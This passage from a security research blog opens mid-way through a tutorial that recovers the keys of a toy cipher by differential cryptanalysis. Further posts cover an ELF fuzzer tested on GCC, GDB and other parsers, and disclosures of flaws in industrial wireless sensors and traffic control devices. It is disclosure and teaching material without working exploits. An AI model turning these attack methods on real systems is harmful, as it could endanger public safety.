We know that when it comes to the cryptographic security of an encryption function, the only thing that should be relied on for confidentiality is your secret key (as a great Dutch cryptographer put it a long time ago [https://en.wikipedia.org/wiki/Auguste_Kerckhoffs]). This means the algorithm, including the workings of the SBOXs, will be known (or rather, in our analysis, we should always assume it will be known) by our attacker. Anything secret in our algorithm cannot be relied on for security. More specifically, any operation that is completely reversible (requiring only knowledge of the ciphertext) is useless!

When it comes to the use of substitution boxes, unless something we don’t know meaningfully obscures the output of the SBOX, using it will not add any security. It will be reduced to a mere reversible “encoding” of its input.

Looking at the algebraic form in (1), we can see the cipher pulls the input through the SBOX again in its last operation before returning it as ciphertext. This operation adds no security at all, especially in the context of a differential attack, because it is trivial to reverse the effect of the last SBOX: anyone who knows the ciphertext (and the public SBOX) can simply look up the corresponding input. We can therefore reduce the encryption function and focus on what actually adds security. The function becomes:

C = SBOX(P ⊕ K_0) ⊕ K_1    (2)

Ironically, the SBOX in expression (2) is now the only thing that adds security, so it will be the target of our analysis. Consider what would happen if we could know the output of the SBOX in addition to the plaintext/ciphertext pairs. The entire security of the cipher would fly out the window. After a few XOR operations, we would be able to work out the second key and, by extrapolation, the first key.

But how would we know the SBOX output? Well, what about analyzing the way the SBOX behaves by observing how differences between its inputs map to differences in its outputs? This insight is at the heart of differential cryptanalysis! Why choose this property? The only thing we have access to in a differential cryptanalysis attack is plaintext/ciphertext pairs (thems the rules), so we need to derive our information from this data. Also, XOR differences are unaffected by key XORs, since (x ⊕ k) ⊕ (x' ⊕ k) = x ⊕ x'. If we look at how the SBOX maps these differences, this is what we get:

∆x   ∆y   count   [(x, x'), (y, y')]
15    4     1     [(0, 15), (3, 7)]
15    7     1     [(3, 12), (10, 13)]
15    6     2     [(4, 11), (4, 2)]  [(5, 10), (9, 15)]
 5   15     1     [(3, 6), (10, 5)]
 5   10     2     [(0, 5), (3, 9)]  [(1, 4), (14, 4)]
 3   15     1     [(1, 2), (14, 1)]
 3   12     2     [(5, 6), (9, 5)]  [(13, 14), (12, 0)]
 3   10     2     [(8, 11), (8, 2)]  [(12, 15), (13, 7)]
 5    2     1     [(11, 14), (2, 0)]
 5    4     1     [(8, 13), (8, 12)]
 5    7     1     [(2, 7), (1, 6)]
 5    6     1     [(9, 12), (11, 13)]
 5    8     1     [(10, 15), (15, 7)]
 4   15     1     [(10, 14), (15, 0)]
 4   12     1     [(3, 7), (10, 6)]
 1    7     1     [(14, 15), (0, 7)]
 1    1     1     [(12, 13), (13, 12)]
Where
  • ∆x = x ⊕ x'
  • ∆y = y ⊕ y'
  • (x, x') is the input pair to the SBOX
  • (y, y') is the output pair from the SBOX
  • ∆x → ∆y is a differential characteristic
  • Count is the number of times the differential characteristic appears
 
This table is a small sample of the data collected from the SBOX.
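The table can be generated mechanically by enumerating every input pair. A minimal sketch, using the same SBOX values reconstructed from the pairs above:

```python
from collections import defaultdict

# Toy SBOX, reconstructed from the (input, output) pairs in the table above.
SBOX = [3, 14, 1, 10, 4, 9, 5, 6, 8, 11, 15, 2, 13, 12, 0, 7]

# For every unordered input pair, record which input difference (dx)
# maps to which output difference (dy), and the pairs that produce it.
ddt = defaultdict(list)
for x in range(16):
    for x2 in range(x + 1, 16):
        y, y2 = SBOX[x], SBOX[x2]
        ddt[(x ^ x2, y ^ y2)].append(((x, x2), (y, y2)))
```

For example, `ddt[(15, 7)]` holds the single pair ((3, 12), (10, 13)), matching the 15 → 7 row of the table; an ideal SBOX would spread these counts as evenly as possible.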

This mapping of the XOR difference in the input to the XOR difference in the output is called a differential characteristic, hence the name “differential” cryptanalysis! We can now use this data to steal the secret key! Given cipher-text/plain-text pairs, we need to find one encrypted under our target key that satisfies one of the differential characteristics. To find such a pair, you need to do the following:

Consider a sample differential characteristic a → b (this can be any differential):
  1. Choose (or generate) one plain-text P, and produce another plain-text P' = P ⊕ a, where a is an input differential (notice that the XOR difference of P and P' is a!)
  2. Encrypt the two plain-texts (P, P') to get (C, C')
  3. If C ⊕ C' = b, then you have a good pair!
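Using the same toy SBOX and the reduced cipher (2), the three steps above might look like this in code (a hedged sketch, not the original script):

```python
import random

# Toy SBOX reconstructed from the table; reduced cipher (2): C = SBOX(P ^ K0) ^ K1.
SBOX = [3, 14, 1, 10, 4, 9, 5, 6, 8, 11, 15, 2, 13, 12, 0, 7]

def encrypt(p, k0, k1):
    return SBOX[p ^ k0] ^ k1

def find_good_pair(a, b, k0, k1):
    """Generate plaintext pairs with input difference a until the
    ciphertext difference is b."""
    while True:
        p = random.randrange(16)
        p2 = p ^ a                                       # step 1
        c, c2 = encrypt(p, k0, k1), encrypt(p2, k0, k1)  # step 2
        if c ^ c2 == b:                                  # step 3: good pair!
            return (p, p2), (c, c2)
```

With the sample setup below (keys 0 and 6) and the characteristic 15 → 7, this search can only ever land on the plaintext pair {3, 12}, because that is the only input pair of the SBOX with that characteristic.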

If you know that a → b is the differential that suits your text pair, you now know the potential input/output pairs for the SBOX, thanks to the analysis we did earlier. Given these pairs, you can try different calculations for the key. You will likely have a couple of possible keys, but one of them will definitely be the correct one.

For example, let’s say we have the following setup:

The keys K_0, K_1 : 0,6
 (p,p’) :=> (c,c’) : input_diff :=> output_diff : [count, [(sI,sI’),(sO,sO’)]… ]
 (3,12) -> (11, 12) : 15 :=> 7 : [1, [[(3, 12), (10, 13)]]]
 (5,10) -> (9, 15) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (4,11) -> (4, 2) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (5,10) -> (9, 15) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (3,6) -> (3, 12) : 5 :=> 15 : [1, [[(3, 6), (10, 5)]]]

The script that generated this output is available at the end of the post.

We need to select a plain-text/cipher-text pair and use the information associated with that pair to calculate the key. So, for example, using (3,12) => (11,12), we can calculate K_0 and K_1 in the following way:

Given that (from the last operation of the cipher):

C=K_1⊕ S_o

We know that (because of how XOR works):

K_1=C⊕ S_o

We have a couple of choices for those values, so we need to run through them.
Given that:
C=(11,12) (a tuple, because we are using a pair of cipher-texts)
P=(3,12)
S_i=(3,12)
S_o=(10,13)
We can then try to calculate the second round key as:
K_1=C[0]⊕ S_o [0]=1   wrong!
K_1=C[0]⊕ S_o [1]=6   right!
(3)
We can also calculate K_0, namely:
K_0=P[1]⊕S_i[0]=15   wrong!
K_0=P[0]⊕S_i[1]=15   wrong!
K_0=P[0]⊕S_i[0]=0    right!
(4)
We’ve just derived the two sub-keys! Cryptanalysis successful!
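The trial XOR calculations in (3) and (4) can be automated. The sketch below (same assumed toy SBOX and reduced cipher) derives candidate keys from one good pair, then uses a second known pair from the sample output to prune the impostors, which is why a couple of candidates are expected:

```python
# Toy SBOX reconstructed from the table; reduced cipher (2): C = SBOX(P ^ K0) ^ K1.
SBOX = [3, 14, 1, 10, 4, 9, 5, 6, 8, 11, 15, 2, 13, 12, 0, 7]

def encrypt(p, k0, k1):
    return SBOX[p ^ k0] ^ k1

P, C = (3, 12), (11, 12)       # good pair for the characteristic 15 -> 7
S_i, S_o = (3, 12), (10, 13)   # SBOX input/output pair from the table

# Each pairing of a ciphertext with an SBOX output suggests a K1, and each
# pairing of a plaintext with an SBOX input suggests a K0. Keep the guesses
# that actually map the plaintext pair onto the ciphertext pair.
candidates = set()
for so in S_o:
    for si in S_i:
        k0, k1 = P[0] ^ si, C[0] ^ so
        if sorted(encrypt(p, k0, k1) for p in P) == sorted(C):
            candidates.add((k0, k1))

# One good pair leaves several consistent keys; a second pair from the
# sample output, (3, 6) -> (3, 12), singles out the true sub-keys.
P2, C2 = (3, 6), (3, 12)
keys = [k for k in candidates
        if sorted(encrypt(p, *k) for p in P2) == sorted(C2)]
```

Running this leaves only the true sub-keys (0, 6) in `keys`, matching the worked example above.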
The weird behavior of the SBOX under differential mapping is what makes differential cryptanalysis possible, but this is not to say that it is the ONLY way to perform differential cryptanalysis. The property we are using here (XOR differences) is merely one application of this concept. You should think about differential cryptanalysis as leveraging any operation in an encryption function that can be used to “explain” differences in input/output pairs. So when you’re done reading about this application, look at some of the other common operations in encryption functions and think about what else, besides SBOXs, can be abused in this way; what other properties of input/output pairs have interesting behaviors under common operations?
Also, it may be useful to think about how you can extend this application of differential cryptanalysis to attack multi-round ciphers (i.e., ciphers built from multiple rounds of computation like the one we’ve attacked here).
Further Reading and References:
Some Scripts to play around with:

RESEARCH | July 2, 2015

Hacking Wireless Ghosts Vulnerable For Years

Is the risk associated with a Remote Code Execution vulnerability in an industrial plant the same when it can affect human life? When calculating risk, certain variables and metrics are combined into equations that are rendered as static numbers, so that risk remediation efforts can be prioritized. But such calculations sometimes ignore the environmental metrics and rely exclusively on exploitability and impact. The practice of scoring vulnerabilities without auditing the potential for collateral damage could underestimate a cyber attack that affects human safety in an industrial plant and leads to catastrophic damage or loss. These deceiving scores are always attractive for attackers, since lower-priority security issues are less likely to be resolved on time with a quality remediation.

In the last few years, the world has witnessed advanced cyber attacks against industrial components using complex and expensive malware engineering. Today, the lack of entry points for hacking an isolated process inside an industrial plant means that attacks require a combination of zero-day vulnerabilities and more money.

Two years ago, Carlos Mario Penagos (@binarymantis) and I (Lucas Apa) realized that the most valuable entry point for an attacker is in the air. Radio frequencies leak out of a plant’s perimeter through the high-power antennas that interconnect field devices. Communicating with the target devices from a distance is priceless because it allows an attack to be totally untraceable and frequently unstoppable.

In August 2013 at Black Hat Briefings, we reported multiple vulnerabilities in the industrial wireless products of three vendors and presented our findings. We censored vendor names from our paper to protect the customers who use these products, primarily nuclear, oil and gas, refining, petro-chemical, utility, and wastewater companies mostly based in North America, Latin America, India, and the Middle East (Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and UAE). These companies have trusted expensive but vulnerable wireless sensors to bridge the gap between the physical and digital worlds.

First, we decided to target wireless transmitters (sensors). These sensors gather the physical, real-world values used to monitor conditions, including liquid level, pressure, flow, and temperature. These values are precise enough to be trusted by all of the industrial hardware and machinery in the field. Crucial decisions are based on these numbers. We also targeted wireless gateways, which collect this information and communicate it to the backbone SCADA systems (RTU/EFM/PLC/HMI).

In June 2013, we reported eight different vulnerabilities to the ICS-CERT (Department of Homeland Security). Three months later, one of the vendors, ProSoft Technology released a patch to mitigate a single vulnerability.

After a patient year, in 2014 IOActive Labs released an advisory titled “OleumTech Wireless Sensor Network Vulnerabilities,” describing four vulnerabilities that could lead to process compromise, public damage, and risks to employee safety, potentially including the loss of life.

Figure 1: OleumTech Transmitters infield

The following OleumTech Products are affected:

  • All OleumTech Wireless Gateways: WIO DH2 and Base Unit (RFv1 Protocol)
  • All OleumTech Transmitters and Wireless Modules (RFv1 Protocol)
  • BreeZ v4.3.1.166

An untrusted user or group within a 40-mile range could inject false values on the wireless gateways in order to modify measurements used to make critical decisions. In the following video demonstration, an attacker makes a chemical react and explode by targeting a wireless transmitter that monitors the process temperature. This was possible because a proper failsafe mechanism had not been implemented and physical controls failed. Heavy machinery makes crucial decisions based on the false readings; this could give the attacker control over part of the process.

Figure 2: OleumTech DH2 used as the primary Wireless Gateway to collect wireless end node data.
Video:  Attack launched using a 40 USD RF transceiver and antenna

Industrial embedded systems’ vulnerabilities that can be exploited remotely without needing any internal access are inherently appealing for terrorists.

Mounting a destructive, real-world attack in these conditions is possible. These products are in commercial use in industrial plants all over the world. As if causing unexpected chemical reactions is not enough, exploiting a remote, wireless memory corruption vulnerability could shut down the sensor network of an entire facility for an undetermined period of time.

In May 2015, two years from the initial private vulnerability disclosure, OleumTech created an updated RF protocol version (RFv2) that seems to allow users to encrypt their wireless traffic with AES256. Firmware for all products was updated to support this new feature.

Still, are OleumTech customers aware of how the new AES Encryption key is generated? Which encryption key is the network using?

Figure 3: Picture from OleumTech BreeZ 5 – Default Values (AES Encryption)

Since every hardware device must be removed from its field location for a manual update, what is the cost?

IOActive Labs hasn’t tested these firmware updates. We hope that OleumTech’s technical team performed testing to ensure that the firmware is properly securing radio communications.

I am proud that IOActive has one of the largest professional teams of information security researchers who work with ICS-CERT (DHS) in the world. In addition to identifying critical vulnerabilities and threats for power system facilities, the IOActive team provides security testing directly for control system manufacturers and businesses that have industrial facilities – proactively detecting weaknesses and anticipating exploits in order to improve the safety and operational integrity of technologies.

Needless to say, the companies that rely on vulnerable devices could lose much more than millions of dollars if these vulnerabilities are exploited. These flaws have the potential for massive economic and sociological impact, as well as loss of human life. On the other hand, some attacks are undetectable so it is possible that some of these devices already have been exploited in the wild. We may never know. Fortunately, customers now have a stronger security model and I expect that they now are motivated enough to get involved and ask the vulnerable vendors these open questions.

INSIGHTS | November 6, 2014

ELF Parsing Bugs by Example with Melkor Fuzzer

Too often the development community continues to blindly trust the metadata in Executable and Linking Format (ELF) files. In this paper, Alejandro Hernández walks you through the testing process for seven applications and reveals the bugs that he found. He performed the tests using Melkor, a file format fuzzer he wrote specifically for ELF files.

 

Introduction

The ELF file format, like any other file format, is an array of bits and bytes interconnected through data structures. When interpreted by an ELF parser, an ELF file makes sense, depending upon the parsing context: runtime (execution view) or static (linking view).
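For a feel of the metadata a parser must trust from the first byte, here is a minimal, hypothetical reader (not part of Melkor) for the fields that begin every ELF file:

```python
import struct

def read_elf_header(path):
    """Return the class, endianness, type, and machine of an ELF file,
    trusting only the leading magic bytes."""
    with open(path, "rb") as f:
        ehdr = f.read(64)                 # enough for a 64-bit Elf64_Ehdr
    if ehdr[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = {1: "ELF32", 2: "ELF64"}.get(ehdr[4], "invalid")
    ei_data  = {1: "little-endian", 2: "big-endian"}.get(ehdr[5], "invalid")
    # e_type and e_machine sit right after the 16-byte e_ident array
    # (decoded little-endian here for simplicity).
    e_type, e_machine = struct.unpack_from("<HH", ehdr, 16)
    return ei_class, ei_data, e_type, e_machine
```

Every one of these fields is attacker-controlled in a malformed file, which is exactly what a fuzzer exercises.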

In 1999, ELF was chosen as the standard binary file format for *NIX systems, and now, about 15 years later, we are still in many instances blindly trusting the (meta)data within ELF files, either as executable binaries, shared libraries, or relocation objects.

However, blind trust is not necessary. Fuzzing tools are available to run proper safety checks for every single untrusted field.

To demonstrate, I tested and found bugs in seven applications using Melkor, a file format fuzzer specifically for ELF files that I developed: https://github.com/IOActive/Melkor_ELF_Fuzzer.

The following were tested:

  • HT Editor 2.1.0
  • GCC (GNU Compiler) 4.8.1
  • Snowman Decompiler v0.0.5
  • GDB (GNU Debugger) 7.8
  • IDA Pro (Demo version) 6.6.140625
  • OpenBSD 5.5 ldconfig
  • OpenBSD 5.5 Kernel

Most, if not all, of these bugs were reported to the vendors or developers.

Almost all, if not all, were only crashes (invalid memory dereferences) and I did not validate whether they’re exploitable security bugs. Therefore, please do not expect a working command execution exploit at the end of this white paper.

Melkor is an intuitive and, therefore, easy-to-use fuzzer. To get started, you simply identify:

  • The kind of metadata you want to fuzz
  • A valid ELF file to use as a template
  • The number of test cases you want to generate (malformed ELF files that I call ‘orcs,’ as shown in my Black Hat Arsenal presentation, slides 51 and 52) [1]
  • The likelihood of each fuzzing rule as a percentage
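Conceptually, those inputs drive a simple mutation loop. The toy stand-in below (not Melkor's actual implementation) flips bytes of a template's ELF header with a given likelihood and writes out n test cases:

```python
import os
import random

def generate_orcs(template, outdir, n=1000, likelihood=0.2, seed=None):
    """Write n mutated copies of the template file into outdir, corrupting
    each header byte with probability `likelihood` (toy stand-in for Melkor)."""
    rng = random.Random(seed)
    data = bytearray(open(template, "rb").read())
    os.makedirs(outdir, exist_ok=True)
    for i in range(n):
        orc = bytearray(data)
        # Mutate only the ELF header region (64 bytes covers an Elf64_Ehdr),
        # skipping the \x7fELF magic so parsers get past the first check.
        for off in range(4, min(64, len(orc))):
            if rng.random() < likelihood:
                orc[off] = rng.randrange(256)
        with open(os.path.join(outdir, f"orc_{i:04d}"), "wb") as f:
            f.write(bytes(orc))
```

Melkor itself applies format-aware fuzzing rules rather than blind byte flips, but the generate-then-test workflow is the same.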

Options supported by Melkor:

For a quiet output, use the -q switch.

1. – Melkor Test of HT Editor 2.1.0

HT (http://hte.sourceforge.net) is my favorite ELF editor. It has parsers for all internal metadata.

Test Case Generation

To start, we’ll fuzz only the ELF header, with a 20% chance of executing each fuzzing rule, to create 1000 test cases:

$./melkor -H templates/foo -l 20 -n 1000

You will find the test cases that are generated in the orcs_foo directory along with a detailed report explaining what was fuzzed internally.

Fuzzing the Parser

You could perform manual testing by supplying each orc (test case) as a parameter to HT Editor. However, it would take a long time to go through 1000 test cases.

For that reason, Melkor comes with two testing scripts:

  • For Linux, test_fuzzed.sh
  • For Windows systems, win_test_fuzzed.bat

To run the test cases automatically, enter:

$./test_fuzzed.sh orcs_foo/ "ht"

Every time HT Editor opens a valid ELF file, you must press the [F10] key to continue to the next test case.

The Bug

After 22 tries, the test case orc_0023 crashed the HT Editor:

The next step is to identify the cause of the crash by reading the detailed report generated by Melkor:


By debugging it with GDB, you would see:

 

 

Effectively, there is a NULL pointer dereference in the instruction mov (%rdi),%rax.

2. – Melkor Test of GCC (GNU Compiler) 4.8.1

I consider GCC to be the compiler of excellence. When you type gcc foo.c -o foo, you’re performing all the phases (compilation, linking, etc.); however, if you only want to compile, the -c flag is necessary, as in gcc -c foo.c, to create the ELF relocatable object foo.o.

Normally, relocations and/or symbol tables are an important part of .o objects. This is what we are going to fuzz.

 

Test Case Generation

Inside the templates/ folder, a foo.o file is compiled by the same Makefile that builds Melkor; it will be used as a template to create 5000 (the default for the -n option) malformed relocatable files. We instruct Melkor to fuzz the relocations within the file (-R) as well as the symbol tables (-s):

 

$./melkor -Rs templates/foo.o

 

During the fuzzing process, you may see verbose output:

 

 

Fuzzing the Parser


 

In order to test GCC with every malformed .o object, a command like gcc -o output malformed.o must be executed. To do so automatically, the following arguments are supplied to the testing script:

 

$./test_fuzzed.sh orcs_foo.o/ "gcc -o output"

 

You can observe how mature GCC is and how it properly handles every malformed struct, field, size, etc.:


The Bug

 

Normally, in a Linux system, when a program fails due to memory corruption or an invalid memory dereference, it writes to STDERR the message: “Segmentation fault.” As a quick way to identify if we found bugs in the linker, we can simply look for that message in the output of the testing script (the script already redirected the STDERR of each test case to STDOUT).

 

$./test_fuzzed.sh orcs_foo.o/ "gcc -o output" | egrep "Testing program|Segmentation fault"


Filtering for only those that ended with a “Segmentation fault,” I saw that 197 of 5000 test cases triggered a bug.
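The same triage can be scripted without grepping, by checking each child's exit status for a signal. A hypothetical helper (not part of Melkor's scripts) assuming a POSIX system:

```python
import subprocess

def find_segfaults(cmd, testcases):
    """Run cmd against each test case and return those that crashed with
    SIGSEGV (a negative returncode means the child died on that signal)."""
    crashed = []
    for tc in testcases:
        proc = subprocess.run(cmd + [tc],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)
        if proc.returncode == -11:        # -SIGSEGV on POSIX systems
            crashed.append(tc)
    return crashed
```

For the GCC run above, cmd would be something like ["gcc", "-o", "output"], and the length of the returned list would report the 197 crashing orcs.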

 

3. – Melkor Test of the Snowman Decompiler v0.0.5


Snowman (http://derevenets.com) is a great native code to C/C++ decompiler for Windows. It’s free and supports PE and ELF formats in x86 and x86-64 architectures.

 

 

Test Case Generation


In the previous example, I could have mentioned that after a period of testing, I noticed that some applications properly validated all fields in the initial header and handled the errors. So, in order to fuzz more internal levels, I implemented the following metadata dependencies in Melkor, which shouldn’t be broken:


With these dependencies, it’s possible to corrupt deeper metadata without corrupting structures at higher levels. In the previous GCC example, these dependencies were transparently in place to reach the third and fourth levels of metadata, the symbol tables and relocation tables respectively. For more about dependencies in Melkor, see Melkor Documentation: ELF Metadata Dependencies [2].

 

Continuing with Snowman, I created only 200 test cases with fuzzed sections in the Section Header Table (SHT), without touching the ELF header, using the default likelihood of fuzzing rules execution, which is 10%:

 

 

$./melkor -S templates/foo -n 200

 

 

Fuzzing the Parser


 

Since snowman.exe runs on Windows machines, I then copied the created test cases to the Windows box where Snowman was loaded and tested each case using win_test_fuzzed.bat as follows:

 

C:\Users\nitr0us\Downloads>melkor-v1.0\win_test_fuzzed.bat orcs_foo_SHT_snowman snowman-v0.0.5-win-x64\snowman.exe

 

For every opened snowman.exe for which there is no exception, it’s necessary to close the window with the [Alt] + [F4] keyboard combination. Sorry for the inconvenience, but I kept the testing scripts as simple as possible.

 

 

The Bug


 

I was lucky on testing day. The second orc triggered an unhandled exception that made Snowman fail:


4. – Melkor Test of GDB (GNU Debugger) 7.8


GDB, the most used debugger in *NIX systems, is another great piece of code.

When you type gdb foo, the necessary ELF data structures and other metadata are parsed and prepared before the debugging process; however, when you execute a program within GDB, some other metadata is parsed.

 

Test Case Generation


Most applications rely on the SHT to reach more internal metadata; the data and the code itself, etc. As you likely noticed in the previous example and as you’ll see now with GDB, malformed SHTs might crash many applications. So, I created 2000 orcs with fuzzed SHTs:

 

$./melkor -S templates/foo -n 2000

 

To see the other examples, GDB, IDA Pro, ldconfig and OpenBSD kernel, please continue reading the white paper at http://www.ioactive.com/pdfs/IOActive_ELF_Parsing_with_Melkor.pdf

 

Conclusion


Clearly, we would be in error if we assumed that ELF files, due to the age of the format, are free from parsing mistakes; common parsing mistakes are still found.

It would also be a mistake to assume that parsers are just in the OS kernels, readelf or objdump. Many new programs support 32 and 64-bit ELF files, and antivirus engines, debuggers, OS kernels, reverse engineering tools, and even malware may contain ELF parsers.

 

I hope you have seen from these examples that fuzzing is a very helpful method to identify functional (and security) bugs in your parsers in an automated fashion. An attacker could convert a single crash into an exploitable security bug in certain circumstances or those small crashes could be employed as anti-reversing or anti-infection techniques.

 

 

Feel free to fuzz, crash, fix, and/or report the bugs you find to make better software.

 

 

Happy fuzzing.

 

Alejandro Hernández  @nitr0usm

Extract from white paper at IOActive_ELF_Parsing_with_Melkor

 

 

Acknowledgments

IOActive, Inc.

 

References

[1]  Alejandro Hernández. “In the lands of corrupted elves: Breaking ELF software with Melkor fuzzer.”  <https://ioactive.com/wp-content/uploads/2014/11/us-14-Hernandez-Melkor-Slides.pdf>
[2] Melkor Documentation: ELF Metadata Dependencies and Fuzzing Rules. <https://github.com/IOActive/Melkor_ELF_Fuzzer/tree/master/docs>
[3] IOActive Security Advisory: OpenBSD 5.5 Local Kernel Panic. <http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf>

RESEARCH | August 14, 2014

Remote survey paper (car hacking)

Good Afternoon Interwebs,
Chris Valasek here. You may remember me from such nature films as “Earwigs: Eww”.
Charlie and I are finally getting around to publicly releasing our remote survey paper. I thought this went without saying but, to reiterate, we did NOT physically look at the cars that we discussed. The survey was designed as a high level overview of the information that we acquired from the mechanic’s sites for each manufacturer. The ‘Hackability’ is based upon our previous experience with automobiles, attack surface, and network structure.
Enjoy!
RESEARCH | July 31, 2014

Hacking Washington DC traffic control systems

This is a short blog post, because I’ve talked about this topic in the past. I want to let people know that I have the honor of presenting at DEF CON on Friday, August 8, 2014, at 1:00 PM. My presentation is entitled “Hacking US (and UK, Australia, France, Etc.) Traffic Control Systems”. I hope to see you all there. I’m sure you will like the presentation.

I am frustrated with Sensys Networks’ (the vulnerable devices’ vendor) lack of cooperation, but I realize that I should be thankful. This has prompted me to further my research and try different things, like performing passive onsite tests on real deployments in cities like Seattle, New York, and Washington DC. I’m not so sure these cities are equally thankful, since they have to deal with thousands of installed vulnerable devices, which are currently being used for critical traffic control.

The latest Sensys Networks numbers indicate that approximately 200,000 sensor devices are deployed worldwide. See http://www.trafficsystemsinc.com/newsletter/spring2014.html. Based on a unit cost of approximately $500, approximately $100,000,000 of vulnerable equipment is buried in roads around the world that anyone can hack. I’m also concerned about how much it will cost taxpayers to fix and replace the equipment.

One way I confirmed that Sensys Networks devices were vulnerable was by traveling to Washington DC to observe a large deployment that I got to know.

When I exited the train station, the fun began.

INSIGHTS | April 30, 2014

Hacking US (and UK, Australia, France, etc.) Traffic Control Systems

Probably many of you have watched scenes from “Live Free or Die Hard” (Die Hard 4) where “terrorist hackers” manipulate traffic signals by just hitting Enter or typing a few keys. I wanted to do that! I started to look around, and while I couldn’t exactly do the same thing (too Hollywood style!), I got pretty close. I found some interesting devices used by traffic control systems in important US cities, and I could hack them 🙂 These devices are also used in cities in the UK, France, Australia, China, etc., making them even more interesting.
After getting the devices, it wasn’t difficult to find vulnerabilities (actually, it was more difficult to make them work properly, but that’s another story).

The vulnerabilities I found allow anyone to take complete control of the devices and send fake data to traffic control systems. Basically anyone could cause a traffic mess by launching an attack with a simple exploit programmed on cheap hardware ($100 or less).
I even tested the attack launched from a drone flying at over 650 feet, and it worked! Theoretically, an attack could be launched from up to 1 or 2 miles away with a better drone and hardware equipment, I just used a common, commercially available drone and cheap hardware. Since it seems flying a drone in the US is not illegal and anyone will be able to get drones on demand soon, I would be worried about attacks from the sky in the US.
It might also be possible to create self-replicating malware (worm) that can infect these vulnerable devices in order to launch attacks affecting traffic control systems later. The exploited device could then be used to compromise all of the same devices nearby.
 
What worries me the most is that if a vulnerable device is compromised, it’s really, really difficult and really, really costly to detect it. So there could already be compromised devices out there that no one knows about or could know about. 
 
Let me give you an idea of how affected some cities are. The following is from documentation from vulnerable vendors:
  • 250+ customers in 45 US states and 10 countries
  • Important US cities have deployments: New York, Washington DC, San Francisco, Los Angeles, Boston, Seattle, etc.
  • 50,000+ devices deployed worldwide (most of them in the US)
  • Countries include US, United Kingdom, China, Canada, Australia, France, etc. For instance, some UK cities with deployments: London, Shropshire, Slough, Bournemouth, Aberdeen, Blackburn with Darwen Borough Council, Belfast, etc. 
  • Australia has a big deployment on one of the most important and modern freeways.


As you can see, there are 50,000+ devices out there that could be hacked and cause traffic messes in many important cities.

Going onsite
I knew that the devices I have are vulnerable, but I wanted to be 100% sure that I wasn’t missing anything with my tests. Real-life deployments could have different configurations (different hardware/software versions), and it seemed that the vendor provided wrong information when I reported the vulnerabilities, so maybe what I found didn’t affect real-life deployments. I put my “tools” in my backpack and went to Seattle, New York, and Washington DC to do some “passive” onsite tests (“no hacking and nothing illegal” :)). Luckily, I could confirm that what I found applied to real-life deployments. BTW, many thanks to Ian Amit for the pictures and videos and for daring to go with me to DC :).

Vulnerabilities
As you may have already realized, I’m not going to share specific technical details here (for that, you will have to wait and go to Infiltrate 2014 in a couple of weeks). What I would like to mention is that the vendor was contacted a long time ago (September 2013) through ICS-CERT (the initial report to ICS-CERT was sent on July 31, 2013). I was told by ICS-CERT that the vendor said they didn’t think the issues were critical or even important. For instance, regarding one of the vulnerabilities, the vendor said that since the devices were designed that way (insecure) on purpose, they were working as designed, and that customers (state/city governments) wanted the devices to work that way (insecure), so there wasn’t any security issue. Yes, that was the answer. I couldn’t believe it.
 
Regarding another vulnerability, the vendor said that it’s already fixed on newer versions of the device. But there is a big problem: you need to get a new device and replace the old one. This is not good news for state/city governments, since thousands of devices are already out there, and the time and money it would take to replace all of them is considerable. Meanwhile, the existing devices are vulnerable and open to attack.
 
Another excuse the vendor provided is that because the devices don’t control traffic lights, there is no need for security. This is crazy, because while the devices don’t directly control traffic lights, they have a direct influence on the actions and decisions of the traffic control systems that do.

I tried several times to make ICS-CERT and the vendor understand that these issues were serious, but I couldn’t convince them. In the end I said: if the vendor doesn’t think they are vulnerable, then OK, I’m done with this. I have tried hard, and I don’t want to keep wasting time and effort. Also, since DHS is aware of this (through ICS-CERT), and it seems that this is not critical or important to them, there isn’t anything else I can do except go public.
 
This should be another wake-up call for governments to evaluate the security of devices/products before using them in critical infrastructure, and also a request to providers of government devices/products to take security and security vulnerability reports seriously.
 
Impact
 
By exploiting the vulnerabilities I found, an attacker could cause traffic jams and problems at intersections, freeways, highways, etc. 
It’s possible to make traffic lights (depending on the configuration) stay green for more or less time, stay red and never change to green (I bet many of you have experienced something like this when driving late at night during non-traffic hours, or while on a bike or in a small car), or flash. It’s also possible to cause electronic signs to display incorrect speed limits and instructions, and to make ramp meters allow cars onto the freeway faster or slower than needed.
 
These traffic problems could cause real issues, even deadly ones, by causing accidents or blocking ambulances, firefighters, or police cars responding to an emergency call.

I’m sure there are manual overrides and secondary controls in place that can be used if anomalies are detected and that could mitigate possible attacks, and some traffic control systems won’t depend only on these vulnerable devices. But this doesn’t mean that attacks are impossible or really complex; the possibility of a real attack shouldn’t be disregarded, since launching one is simple. The only complex part is making an attack have a bigger impact, but complex doesn’t mean impossible.
 

Traffic departments in states/cities with vulnerable devices deployed should pay special attention to traffic anomalies that have no apparent cause and closely watch the devices’ behavior.
 
“In 2012, there were an estimated 5,615,000 police-reported traffic crashes in which 33,561 people were killed and 2,362,000 people were injured; 3,950,000 crashes resulted in property damage only.” US DoT National Highway Traffic Safety Administration: Traffic Safety Facts
 
“Road crashes cost the U.S. $230.6 billion per year, or an average of $820 per person” Association for Safe International Road Travel: Annual US Road Crash Statistics
 
If you add malfunctioning traffic control systems to the above stats, the numbers could be a lot worse.